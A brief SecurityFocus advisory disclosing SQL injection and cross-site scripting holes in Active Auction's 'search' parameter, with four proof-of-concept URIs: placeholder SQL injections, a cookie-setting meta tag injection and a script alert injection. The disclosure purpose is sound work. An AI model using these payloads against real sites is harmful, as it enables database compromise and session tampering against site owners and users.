Active Auction 'search' Parameter SQL Injection and Cross Site Scripting Vulnerabilities

The following example URIs are available:

http://www.example.com/[Path]/search.asp?search='[SQL]&submit=%3E

http://www.example.com/[Path]/stores.asp?search='[SQL]&submit=Search

http://www.example.com/[Path]/search.asp?search=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&submit=%3E

http://www.example.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E

Copyright 2010, SecurityFocus